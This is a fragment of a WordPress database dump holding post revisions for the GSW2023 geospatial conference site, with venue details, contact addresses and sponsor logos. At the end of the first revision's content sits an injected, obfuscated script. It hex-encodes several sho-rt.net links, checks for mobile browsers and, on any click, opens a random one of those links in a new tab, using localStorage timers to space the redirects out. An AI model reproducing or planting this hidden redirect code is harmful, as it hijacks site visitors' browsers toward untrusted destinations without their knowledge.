2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:53:32','2023-06-24 01:53:32','',3066,'https://gsw2023.com/?p=4812',0,'revision','',0),
(4813,1,'2023-06-24 02:10:24','2023-06-24 02:10:24','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" 